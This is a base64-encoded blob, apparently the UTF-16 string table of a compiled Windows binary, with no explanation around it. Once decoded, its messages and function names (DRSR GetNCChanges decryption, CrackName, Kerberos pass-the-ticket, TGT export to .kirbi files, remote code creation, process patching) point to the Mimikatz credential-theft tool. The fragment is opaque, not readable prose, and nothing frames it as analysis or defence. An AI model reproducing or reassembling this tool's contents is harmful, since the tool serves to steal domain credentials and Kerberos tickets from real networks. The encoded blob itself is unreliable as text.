AXwBEAEUAUwBDAFIASQBQAFQASQBPAE4AXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AQQBDAEMARQBTAFMAXwBTAFQAQQBUAEUAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAFMASQBHAE4AQQBUAFUAUgBFAF8ASABBAFMASABfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8AUwBNAEEAUgBUAF8AQwBBAFIARABfAEQAQQBUAEEAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8ARQBGAFMAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8ARgBPAFIAVABFAFoAWgBBAF8ARABBAFQAQQBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBBAFIAQwBIAEkAVgBFAEQAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEsARQBZAF8ASQBEAEUATgBUAEkARgBJAEUAUgBfAFAAUgBPAFAAXwBJAEQAAABDAEUAUgBUAF8AQQBVAFQATwBfAEUATgBSAE8ATABMAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAFAAVQBCAEsARQBZAF8AQQBMAEcAXwBQAEEAUgBBAF8AUABSAE8AUABfAEkARAAAAAAAAAAAAEMARQBSAFQAXwBDAFIATwBTAFMAXwBDAEUAUgBUAF8ARABJAFMAVABfAFAATwBJAE4AVABTAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBJAFMAUwBVAEUAUgBfAFAAVQBCAEwASQBDAF8ASwBFAFkAXwBNAEQANQBfAEgAQQBTAEgAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAFMAVQBCAEoARQBDAFQAXwBQAFUAQgBMAEkAQwBfAEsARQBZAF8ATQBEADUAXwBIAEEAUwBIAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAEUATgBSAE8ATABMAE0ARQBOAFQAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAEQAQQBUAEUAXwBTAFQAQQBNAFAAXwBQAFIATwBQAF8ASQBEAAAAAAAAAEMARQBSAFQAXwBJAFMAUwBVAEUAUgBfAFMARQBSAEkAQQBMAF8ATgBVAE0AQgBFAFIAXwBNAEQANQBfAEgAQQBTAEgAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AUwBVAEIASgBFAEMAVABfAE4AQQBNAEUAXwBNAEQANQBfAEgAQQBTAEgAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8ARQBYAFQARQBOAEQARQBEAF8ARQBSAFIATwBSAF8ASQBOAEYATwBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBjAGUAcgB0AF8AZgBpAGwAZQBfAGUAbABlAG0AZQBuAHQAAAAAAEMARQBSAFQAXwBjAHIAbABfAGYAaQBsAGUAXwBlAGwAZQBtAGUAbgB0AAAAQwBFAFIAVABfAGMAdABsAF8AZgBpAGwAZQBfAGUAbABlAG0AZQBuAHQAAABDAEUAUgBUAF8AawBlAHkAaQBkAF8AZgBpAGwAZQBfAGUAbABlAG0AZQBuAHQAAABDAEUAUgBUAF8AUgBFAE4ARQBXAEEATABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBBAFIAQwBIAEkAVgBFAEQAXwBLAEUAWQBfAEgAQQBTAEgAXwBQAFIATwBQAF8ASQBEAAAAAABDAEUAUgBUAF8AQQBVAFQATwBfAEUATgBSAE8ATABMAF8AUgBFAFQAUgBZAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAEEASQBBAF8AVQBSAEwAXwBSAEUAVABSAEkARQBWAEUARABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBBAFUAVABIAE8AUgBJAFQAWQBfAEkATgBGAE8AXwBBAEMAQwBFAFMAUwBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBCAEEAQwBLAEUARABfAFUAUABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBPAEMAUwBQAF8AUgBFAFMAUABPAE4AUwBFAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAFIARQBRAFUARQBTAFQAXwBPAFIASQBHAEkATgBBAFQATwBSAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBTAE8AVQBSAEMARQBfAEwATwBDAEEAVABJAE8ATgBfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBTAE8AVQBSAEMARQBfAFUAUgBMAF8AUABSAE8AUABfAEkARAAAAEMARQBSAFQAXwBOAEUAVwBfAEsARQBZAF8AUABSAE8AUABfAEkARAAAAAAAQwBFAFIAVABfAE8AQwBTAFAAXwBDAEEAQwBIAEUAXwBQAFIARQBGAEkAWABfAFAAUgBPAFAAXwBJAEQAAAAAAEMARQBSAFQAXwBTAE0AQQBSAFQAXwBDAEEAUgBEAF8AUgBPAE8AVABfAEkATgBGAE8AXwBQAFIATwBQAF8ASQBEAAAAAAAAAEMARQBSAFQAXwBOAE8AXwBBAFUAVABPAF8ARQBYAFAASQBSAEUAXwBDAEgARQBDAEsAXwBQAFIATwBQAF8ASQBEAAAAQwBFAFIAVABfAE4AQwBSAFk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AIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAGQAdwBQAHUAYgBsAGkAYwBQAHIAbwBwAGUAcgB0AGkAZQBzAEwAZQBuACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAZAB3AFAAcgBpAHYAYQB0AGUAUAByAG8AcABlAHIAdABpAGUAcwBMAGUAbgA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACAAIABkAHcAUAByAGkAdgBhAHQAZQBLAGUAeQBMAGUAbgAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAHUAbgBrAEEAcgByAGEAeQBbADEANgBdACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAJQAqAHMAIAAgAHAATgBhAG0AZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAJQAuACoAcwAKAAAAJQAqAHMAIAAgAHAAUAB1AGIAbABpAGMAUAByAG8AcABlAHIAdABpAGUAcwAgACAAIAAgACAAOgAgAAAAJQAqAHMAIAAgAHAAUAByAGkAdgBhAHQAZQBQAHIAbwBwAGUAcgB0AGkAZQBzACAAIAAgACAAOgAKAAAAJQAqAHMAIAAgAHAAUAByAGkAdgBhAHQAZQBLAGUAeQAgACAAIAAgACAAIAAgACAAIAAgACAAOgAKAAAAJQAqAHMAKgAqAEsARQBZACAAQwBOAEcAIABQAFIATwBQAEUAUgBUAFkAKgAqAAoAAAAAAAAAAAAlACoAcwAgACAAZAB3AFMAdAByAHUAYwB0AEwAZQBuACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAlACoAcwAgACAAdAB5AHAAZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAlACoAcwAgACAAdQBuAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAlACoAcwAgACAAZAB3AE4AYQBtAGUATABlAG4AIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAlACoAcwAgACAAZAB3AFAAcgBvAHAAZQByAHQAeQBMAGUAbgAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACAAIABwAE4AYQBtAGUAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAACUAKgBzACAAIABwAFAAcgBvAHAAZQByAHQAeQAgACAAIAAgACAAIAAgADoAIAAAACUAdQAgAGYAaQBlAGwAZAAoAHMAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAG4AZQB0AF8AZwBlAHQARABDACAAOwAgAEQAcwBHAGUAdABEAGMATgBhAG0AZQA6ACAAJQB1AAoAAABhAAAAIgAlAHMAIgAgAHMAZQByAHYAaQBjAGUAIABwAGEAdABjAGgAZQBkAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoAF8AZwBlAG4AZQByAGkAYwBQAHIAbwBjAGUAcwBzAE8AcgBTAGUAcgB2AGkAYwBlAEYAcgBvAG0AQgB1AGkAbABkACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFYAZQByAHkAQgBhAHMAaQBjAE0AbwBkAHUAbABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoAF8AZwBlAG4AZQByAGkAYwBQAHIAbwBjAGUAcwBzAE8AcgBTAGUAcgB2AGkAYwBlAEYAcgBvAG0AQgB1AGkAbABkACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAUwBlAHIAdgBpAGMAZQAgAGkAcwAgAG4AbwB0ACAAcgB1AG4AbgBpAG4AZwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoAF8AZwBlAG4AZQByAGkAYwBQAHIAbwBjAGUAcwBzAE8AcgBTAGUAcgB2AGkAYwBlAEYAcgBvAG0AQgB1AGkAbABkACAAOwAgAGsAdQBsAGwAXwBtAF8AcwBlAHIAdgBpAGMAZQBfAGcAZQB0AFUAbgBpAHEAdQBlAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoAF8AZwBlAG4AZQByAGkAYwBQAHIAbwBjAGUAcwBzAE8AcgBTAGUAcgB2AGkAYwBlAEYAcgBvAG0AQgB1AGkAbABkACAAOwAgAEkAbgBjAG8AcgByAGUAYwB0ACAAdgBlAHIAcwBpAG8AbgAgAGkAbgAgAHIAZQBmAGUAcgBlAG4AYwBlAHMACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAGMAcgBlAGEAdABlACAAOwAgAFIAdABsAEMAcgBlAGEAdABlAFUAcwBlAHIAVABoAHIAZQBhAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAA7ACAAQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAVABoACAAQAAgACUAcAAKAEQAYQAgAEAAIAAlAHAACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAGMAcgBlAGEAdABlACAAOwAgAGsAdQBsAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBpAG8AYwB0AGwAXwBoAGEAbgBkAGwAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AYwBvAHAAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGEAbABsAG8AYwAgAC8AIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEUAeAApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAgADsAIABOAG8AIABiAHUAZgBmAGUAcgAgAD8ACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAFIAcABjAFMAZQBjAHUAcgBpAHQAeQBDAGEAbABsAGIAYQBjAGsAIAA7ACAAUQB1AGUAcgB5AEMAbwBuAHQAZQB4AHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUgBwAGMAUwBlAGMAdQByAGkAdAB5AEMAYQBsAGwAYgBhAGMAawAgADsAIABJAF8AUgBwAGMAQgBpAG4AZABpAG4AZwBJAG4AcQBTAGUAYwB1AHIAaQB0AHkAQwBvAG4AdABlAHgAdAAgACUAMAA4AHgACgAAAAAAbgBjAGEAYwBuAF8AaQBwAF8AdABjAHAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AYwByAGUAYQB0AGUAQgBpAG4AZABpAG4AZwAgADsAIABSAHAAYwBCAGkAbgBkAGkAbgBnAFMAZQB0AE8AcAB0AGkAbwBuADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AYwByAGUAYQB0AGUAQgBpAG4AZABpAG4AZwAgADsAIABSAHAAYwBCAGkAbgBkAGkAbgBnAFMAZQB0AEEAdQB0AGgASQBuAGYAbwBFAHgAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAE4AbwAgAEIAaQBuAGQAaQBuAGcAIQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGMAcgBlAGEAdABlAEIAaQBuAGQAaQBuAGcAIAA7ACAAUgBwAGMAQgBpAG4AZABpAG4AZwBGAHIAbwBtAFMAdAByAGkAbgBnAEIAaQBuAGQAaQBuAGcAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAFIAcABjAFMAdAByAGkAbgBnAEIAaQBuAGQAaQBuAGcAQwBvAG0AcABvAHMAZQA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAbwBtAGEAaQBuAEEAbgBkAFUAcwBlAHIASQBuAGYAbwBzACAAOwAgAEQAbwBtAGEAaQBuAEMAbwBuAHQAcgBvAGwAbABlAHIASQBuAGYAbwA6ACAARABDACAAJwAlAHMAJwAgAG4AbwB0ACAAZgBvAHUAbgBkAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZwBlAHQARABvAG0AYQBpAG4AQQBuAGQAVQBzAGUAcgBJAG4AZgBvAHMAIAA7ACAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcgBJAG4AZgBvADoAIABiAGEAZAAgAHYAZQByAHMAaQBvAG4AIAAoACUAdQApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAG8AbQBhAGkAbgBBAG4AZABVAHMAZQByAEkAbgBmAG8AcwAgADsAIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIAbwBsAGwAZQByAEkAbgBmAG8AOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAG8AbQBhAGkAbgBBAG4AZABVAHMAZQByAEkAbgBmAG8AcwAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAQwBCAGkAbgBkACAAOwAgAEkAbgBjAG8AcgByAGUAYwB0ACAARABSAFMAIABFAHgAdABlAG4AcwBpAG8AbgBzACAATwB1AHQAcAB1AHQAIAAoACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZwBlAHQARABDAEIAaQBuAGQAIAA7ACAATgBvACAARABSAFMAIABFAHgAdABlAG4AcwBpAG8AbgBzACAATwB1AHQAcAB1AHQACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZwBlAHQARABDAEIAaQBuAGQAIAA7ACAASQBEAEwAXwBEAFIAUwBCAGkAbgBkADoAIAAlAHUACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAEMAQgBpAG4AZAAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAE4ATwBfAEUAUgBSAE8AUgAAAAAARQBSAFIATwBSAF8AUgBFAFMATwBMAFYASQBOAEcAAABFAFIAUgBPAFIAXwBOAE8AVABfAEYATwBVAE4ARAAAAEUAUgBSAE8AUgBfAE4ATwBUAF8AVQBOAEkAUQBVAEUAAAAAAEUAUgBSAE8AUgBfAE4ATwBfAE0AQQBQAFAASQBOAEcAAAAAAEUAUgBSAE8AUgBfAEQATwBNAEEASQBOAF8ATwBOAEwAWQAAAEUAUgBSAE8AUgBfAE4ATwBfAFMAWQBOAFQAQQBDAFQASQBDAEEATABfAE0AQQBQAFAASQBOAEcAAAAAAEUAUgBSAE8AUgBfAFQAUgBVAFMAVABfAFIARQBGAEUAUgBSAEEATAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AQwByAGEAYwBrAE4AYQBtAGUAIAA7ACAAQwByAGEAYwBrAE4AYQBtAGUAcwAgACgAbgBhAG0AZQAgAHMAdABhAHQAdQBzACkAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAgAC0AIAAlAHMACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAEMAcgBhAGMAawBOAGEAbQBlACAAOwAgAEMAcgBhAGMAawBOAGEAbQBlAHMAOgAgAG4AbwAgAGkAdABlAG0AIQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBDAHIAYQBjAGsATgBhAG0AZQAgADsAIABDAHIAYQBjAGsATgBhAG0AZQBzADoAIABiAGEAZAAgAHYAZQByAHMAaQBvAG4AIAAoACUAdQApAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAEMAcgBhAGMAawBOAGEAbQBlACAAOwAgAEMAcgBhAGMAawBOAGEAbQBlAHMAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAEMAcgBhAGMAawBOAGEAbQBlACAAOwAgAFIAUABDACAARQB4AGMAZQBwAHQAaQBvAG4AIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUAByAG8AYwBlAHMAcwBHAGUAdABOAEMAQwBoAGEAbgBnAGUAcwBSAGUAcABsAHkAXwBkAGUAYwByAHkAcAB0ACAAOwAgAEMAaABlAGMAawBzAHUAbQBzACAAZABvAG4AJwB0ACAAbQBhAHQAYwBoACAAKABDADoAMAB4ACUAMAA4AHgAIAAtACAAUgA6ADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAFAAcgBvAGMAZQBzAHMARwBlAHQATgBDAEMAaABhAG4AZwBlAHMAUgBlAHAAbAB5AF8AZABlAGMAcgB5AHAAdAAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGMAYQBsAGMAdQBsAGEAdABlACAAQwBSAEMAMwAyAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAFAAcgBvAGMAZQBzAHMARwBlAHQATgBDAEMAaABhAG4AZwBlAHMAUgBlAHAAbAB5AF8AZABlAGMAcgB5AHAAdAAgADsAIABSAHQAbABFAG4AYwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAUgBDADQACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBQAHIAbwBjAGUAcwBzAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzAFIAZQBwAGwAeQBfAGQAZQBjAHIAeQBwAHQAIAA7ACAATgBvACAAdgBhAGwAaQBkACAAZABhAHQAYQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBQAHIAbwBjAGUAcwBzAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzAFIAZQBwAGwAeQBfAGQAZQBjAHIAeQBwAHQAIAA7ACAATgBvACAAUwBlAHMAcwBpAG8AbgAgAEsAZQB5AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGYAcgBlAGUAXwBEAFIAUwBfAE0AUwBHAF8AQwBSAEEAQwBLAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAbgBhAG0AZQBDAHIAYQBjAGsATwB1AHQAVgBlAHIAcwBpAG8AbgAgAG4AbwB0ACAAdgBhAGwAaQBkACAAKAAwAHg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AOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHQAdABfAGQAYQB0AGEAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUwB1AGIAbQBpAHQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB0AHQAXwBkAGEAdABhACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFMAdQBiAG0AaQB0AFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAAAFQAaQBjAGsAZQB0ACgAcwApACAAcAB1AHIAZwBlACAAZgBvAHIAIABjAHUAcgByAGUAbgB0ACAAcwBlAHMAcwBpAG8AbgAgAGkAcwAgAE8ASwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdQByAGcAZQAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBQAHUAcgBnAGUAVABpAGMAawBlAHQAQwBhAGMAaABlAE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdQByAGcAZQAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBQAHUAcgBnAGUAVABpAGMAawBlAHQAQwBhAGMAaABlAE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAABLAGUAcgBiAGUAcgBvAHMAIABUAEcAVAAgAG8AZgAgAGMAdQByAHIAZQBuAHQAIABzAGUAcwBzAGkAbwBuACAAOgAgAAAAAAAKAAoACQAqACoAIABTAGUAcwBzAGkAbwBuACAAawBlAHkAIABpAHMAIABOAFUATABMACEAIABJAHQAIABtAGUAYQBuAHMAIABhAGwAbABvAHcAdABnAHQAcwBlAHMAcwBpAG8AbgBrAGUAeQAgAGkAcwAgAG4AbwB0ACAAcwBlAHQAIAB0AG8AIAAxACAAKgAqAAoAAAAAAG4AbwAgAHQAaQBjAGsAZQB0ACAAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwB0AGcAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AdABnAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAABlAHgAcABvAHIAdAAAAAAACgBbACUAMAA4AHgAXQAgAC0AIAAwAHgAJQAwADgAeAAgAC0AIAAlAHMAAAAKACAAIAAgAFMAdABhAHIAdAAvAEUAbgBkAC8ATQBhAHgAUgBlAG4AZQB3ADoAIAAAAAAAIAA7ACAAAAAKACAAIAAgAFMAZQByAHYAZQByACAATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAgAEAAIAAlAHcAWgAAAAAAAAAKACAAIAAgAEMAbABpAGUAbgB0ACAATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAgAEAAIAAlAHcAWgAAAAoAIAAgACAARgBsAGEAZwBzACAAJQAwADgAeAAgACAAIAAgADoAIAAAAAAAawBpAHIAYgBpAAAACgAgACAAIAAqACAAUwBhAHYAZQBkACAAdABvACAAZgBpAGwAZQAgACAAIAAgACAAOgAgACUAcwAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHcAcgBpAHQAZQBEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGwAaQBzAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAEUAbgBjAG8AZABlAGQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBr